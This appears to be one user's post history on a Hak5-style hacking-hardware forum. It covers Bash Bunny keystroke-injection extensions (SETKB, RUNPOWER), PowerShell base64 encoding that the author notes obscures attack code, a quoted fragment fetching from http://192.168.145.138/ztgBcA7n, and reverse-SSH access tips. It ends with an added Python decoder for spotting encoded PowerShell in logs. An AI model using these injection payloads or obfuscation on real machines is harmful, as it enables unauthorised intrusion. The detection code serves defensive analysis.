
elkentaro
Active Members
Posts: 78
Days Won: 5

Everything posted by elkentaro

  1. Why not keep it simple and use an LTE MiFi hotspot or GSM modem and have the Pineapple set up a reverse SSH pipe to a server online? That way you can connect to it from anywhere...
  2. Longest record that I know of is still 237 miles. https://www.google.co.jp/amp/s/www.wired.com/2007/06/w-wifi-record-2/amp
  3. Yep, +1 for SecurityTube; even their free mega-primers are some solid courses.
  4. 1.8-1.9 GHz. Good luck, looks like it's a DECT security system (i.e. 128-bit UAK). https://en.wikipedia.org/wiki/Digital_Enhanced_Cordless_Telecommunications#Security
  5. kismet_server --daemonize will run the Kismet server in the background. You can set up the pcap location, wlan etc. settings in /etc/kismet/kismet.conf. Also, sudo systemctl enable gpsd should set up gpsd to start on boot.
  6. I run a cron job to dump the data to a sub directory under home. That way I will always have a copy of my recon data.
  7. My latest Nano project : https://medium.com/@elkentaro/hack-chip-and-pineapples-part-8-of-n-c232e2e3c6e7
  8. @evilsocket has done some offensive setups. https://www.evilsocket.net/2017/08/15/gpd-pocket-7-impressions-gnulinux-installation-and-offensive-setup/
  9. Yea, and it's not meant as a joke. The battery pack will warm up and so will the Nano. In a closed environment, the heat can't disperse as efficiently and could cause issues with power (battery) or the Nano.
  10. Downside would be the heat in your pants....
  11. Ah, I see. My bad then.
  12. Here is a list too: http://www.linux-usb.org/usb.ids
  13. Hm.. cool ideas. I'll think about adding some more stuff to it, once I get back from being on the road.
  14. My bad. The very first one had a typo. It's fixed now. I guess I shouldn't commit code at 4am.
  15. So, a new extension I wrote to avoid having to escape special characters for complex PowerShell commands. This extension takes a text file containing the PowerShell command. Example:
      RUNPOWER switch1/pstxt.txt
      Inside the pstxt.txt file:
      Set-WinUserLanguageList -LanguageList en-US -force;
      Basically it takes the contents of the text file, encodes it to a base64 string and passes it to PowerShell as an encoded command. (Also works as obfuscation of the attack code.) https://github.com/elkentaro/bashbunny-payloads/blob/master/library/extensions/runpower.sh @elkentaro
  16. New version out. SETKB START will switch it to the en-US keyboard, then SETKB DONE will set it back based on the Windows OS language version, and SETKB xx-XX will overwrite to whatever keyboard setting you want. You do have to change the default us.json file to issue a different key code for "-":
      "-":"00:00:56"
      which seems to be the universal key code for "-" on the numpad instead of the keyboard.
  17. I think it's because of: \(\’http://192.168.145.138/ztgBcA7n\'\)\; The first one isn't a single quote but a curly apostrophe and the ending is a single quote, and there is no definition for the curly apostrophe ’ in your language.json file.
  18. Thank yea. However, I still have some issues with some of the keystrokes. So until I get it all sorted out, I'm holding out. (Mainly the issue is with keys that don't exist on a US keyboard, i.e. higher USB HID codes.) But I will keep working on it.
  19. So, when I used my older [language].json file (based off the firmware 1.0 us.json) it doesn't seem to work. However, copying the current us.json file under /usr/local/bunny/lilb/languages and modifying that file, then putting it into /languages and having the Bunny copy the file to the location, it seems to work. So most likely the issue is with the language file. Once the language file is copied over, you can issue the DUCKY_LANG switch in your payload with:
      DUCKY_LANG ja
      I have attached the ja.json file as an example. If you want to test whether your language file is valid and working, you can change the key code for an alphabetical entry. I chose to switch "a" lowercase and uppercase:
      "a": "02,00,04",
      "A": "00,00,04",
      This is actually the reverse, but it will allow you to check if your language file is being used. Hope this helps. Elkentaro. Sample language file: ja.json
  20. I take back what I said. Sorry @Sebkinne. Seems to be an issue with the language file. I just tried again copying the us.json file to another file and changing the key codes, and it seems to be working.
  21. @Sebkinne, I think many of us have tried it according to the documentation. However, the language file does get copied over to the appropriate directory but does not get called in the QUACK script and hence defaults to the us.json because of:
      language = os.getenv("DUCKY_LANG", default="us")
      Initially I thought it could be an issue with the [language].json file I built; however, even copying over the us.json, changing the name and changing 1 keycode for testing still shows that the language file called is the us.json file. Anyway, still digging around to figure out why. (Now, I could be wrong about this... but then again, "exploration" is what hackers do.)
  22. Yea, same problem for me. Trying to debug the problem now, but it might take a while. Somehow the export of the env variable isn't being honored. 2 workarounds I have found so far; both are not ideal but worked for me.
      1. In arming mode, connect to the Bunny via serial and write the DUCKY_LANG env variable in /etc/profile, setting it to whatever your target keyboard is:
         DUCKY_LANG=ja
         The downside is your keyboard settings will be permanent unless you rewrite the profile settings again, i.e. you lose flexibility in a multilingual environment.
      2. If the target is a Windows machine you can use the extension I wrote that will change the layout to an en-US layout, and you can set it back to whatever you want after your attack. The downside of this extension is that it's a bit slower, making the attack a lesser "smash and grab" attack. See:
      Technically there is a 3rd option of rewriting the QUACK file itself, but I don't want to, or think it's a good idea, to screw with the core files.
  23. Not if you are on the new firmware; you can just call it as a command.
      -----sample payload----
      #!/bin/bash
      ATTACKMODE HID VID_0x05AC PID_0x021d
      SETKB en-US
      RUN WIN notepad.exe
      Q DELAY 5000
      Q switch1/quack.txt
      LED R
      -------
  24. So with the new firmware 1.1, we now have extensions. Here is my contribution: it sets the input keyboard layout to en-US (US keyboard) to provide an easier way to work with the payloads. Granted, there is a DUCKY_LANG option; however, it's still a bit wonky for me and, from reading the forums, for some others. This way, you don't need to worry about different layouts.
      ----------------------------------setkb.sh--------------
      #!/bin/bash
      #
      # SETKB v1 by @elkentaro
      # Simplifies executing commands from HID attacks for different language keyboards on Windows by using PowerShell.
      # Usage: SETKB en-US [give the command the 2-letter combination of keyboard settings]
      # Copy the text and save it as setkb.sh under /payloads/library/extensions/
      # Examples:
      # SETKB en-US (set the keyboard layout to a US keyboard layout) [usage prior to HID attack]
      # SETKB ja-JP (set the keyboard layout to a Japanese 106 layout) [usage after HID attack to reset the env]

      function SETKB() {
          local kb=$1
          shift
          [[ -z "$kb" ]] && exit 1 # KB keyboard parameter must be given.
          case "$kb" in
              'en-US')
                  # Open the Run dialog and type the PowerShell one-liner that sets the US layout.
                  QUACK GUI r
                  QUACK DELAY 500
                  QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force"
                  QUACK DELAY 1500
                  QUACK ENTER
                  ;;
              *)
                  # Same sequence for any other layout tag passed as $1.
                  # Note: STRING must be the QUACK command, not part of the quoted text,
                  # otherwise the word STRING is typed and the command is never sent as a string.
                  QUACK GUI r
                  QUACK DELAY 500
                  QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList $kb -force"
                  QUACK DELAY 1500
                  QUACK ENTER
                  ;;
          esac
      }
      export -f SETKB
      ------------------------------------------------
      Minor note: This extension does require that the "-" key has the same key code as the one in us.json.
  25. So yea, I think the issue is with basic keys that don't exist on a US keyboard (which could include media keys like Volume Up etc.). I assume this is due to the HID descriptor being passed; however, I'm not sure if modifying the HID descriptor is the way to go... so for now, using PowerShell to remap the default keyboard layout seems the safest way to go.
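The RUNPOWER post (item 15) describes reading a PowerShell command from a text file, base64-encoding it and handing it to powershell.exe as an encoded command; the SETKB extension (item 24) types a similar Set-WinUserLanguageList one-liner in the clear. The example below is added here and is not code from the forum or from the linked extension. It shows the encoding PowerShell's real -EncodedCommand switch expects (UTF-16LE, then base64) and, for the defender reading process-creation logs, the reverse: pulling the blob out of a command line and decoding it, tolerating stripped padding and a truncated log field. The function names, the SAMPLE_COMMAND value and the sample command lines are constructed for this example.

```python
import base64
import re

# Constructed sample: the one-liner the RUNPOWER post keeps in pstxt.txt.
SAMPLE_COMMAND = "Set-WinUserLanguageList -LanguageList en-US -force;"


def encode_powershell(command: str) -> str:
    """Encode a command the way -EncodedCommand expects it:
    UTF-16LE bytes, then standard base64 (example implementation,
    not the extension's own code)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob: str) -> str:
    """Reverse the encoding.  Logs often lose trailing '=' padding or cut the
    field short, so padding is restored and a dangling odd byte is dropped
    before the UTF-16LE decode; undecodable code units become U+FFFD."""
    blob = blob.strip()
    padded = blob + "=" * (-len(blob) % 4)
    raw = base64.b64decode(padded, validate=False)
    if len(raw) % 2:            # UTF-16 needs byte pairs
        raw = raw[:-1]
    return raw.decode("utf-16-le", errors="replace")


# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc,
# ...), in any letter case, so the extractor matches every prefix.  Longest
# alternatives first keeps the alternation unambiguous.
_PREFIXES = ["ec"] + ["encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)]
_ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)[-/](?:"
    + "|".join(sorted(_PREFIXES, key=len, reverse=True))
    + r")\s+([A-Za-z0-9+/=]+)"
)


def decode_from_cmdline(cmdline: str):
    """Return the decoded script from a process command line, or None when
    no encoded-command switch is present (e.g. -ExecutionPolicy is not one)."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    return decode_powershell(m.group(1))


if __name__ == "__main__":
    # Constructed process-creation records, as a detection analyst might see them.
    samples = [
        "powershell.exe -nop -w hidden -EncodedCommand " + encode_powershell(SAMPLE_COMMAND),
        "powershell.exe -ExecutionPolicy Bypass -File setup.ps1",
        "powershell.exe -enc " + encode_powershell("dir"),
    ]
    for line in samples:
        print(repr(line[:60]), "->", decode_from_cmdline(line))
```

Decoding rather than blocking is the point here: an encoded command is not malicious by itself (the post above uses it to avoid keyboard-layout escaping problems), so a detection rule should decode the payload and judge its contents, and it must cope with the short-prefix switches and truncated fields the regex and decoder handle.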